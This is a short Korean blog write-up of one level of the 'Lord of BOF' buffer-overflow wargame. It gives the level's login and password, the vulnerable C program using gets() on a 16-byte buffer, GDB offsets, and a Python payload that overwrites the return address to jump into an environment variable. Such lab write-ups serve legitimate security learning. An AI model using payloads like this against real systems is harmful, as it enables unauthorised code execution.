SH1R0_HACKER

3. cobolt -> goblin 본문

System/The Lord of BOF

3. cobolt -> goblin

SH1R0_HACKER 2020. 10. 21. 14:56

login : cobolt

password : hacking exposed

[ gobolt.c ]

/*
        The Lord of the BOF : The Fellowship of the BOF
        - goblin
        - small buffer + stdin
*/

int main()
{
    char buffer[16];
    gets(buffer);
    printf("%s\n", buffer);
}

이것도 buffer 공간이 16byte로 적으니깐 환경변수써서 날리면 될거같다.

한번 해보자.

[ GDB 분석 ]

buffer와 ret거리 : 20byte

환경변수 주소 : 0xbffffc92

 

페이로드

(python -c 'print "\x90"*20+"\x92\xfc\xff\xbf"'; cat) | ./goblin

 

cobolt 문제와 마찬가지로 쉽게 풀 수 있었다.

페이로드에 cat을 붙이는 이유

cosyp.tistory.com/208

nobilitycat.tistory.com/entry/ftz-level12

 

저작자표시 비영리 변경금지

'System > The Lord of BOF' 카테고리의 다른 글

6. wolfman -> darkelf  (0) 2020.10.24
5. orc -> wolfman  (0) 2020.10.22
4. goblin -> orc  (0) 2020.10.22
2. gremlin -> cobolt  (0) 2020.10.19
1. gate -> gremlin  (0) 2020.10.18
'System/The Lord of BOF' Related Articles more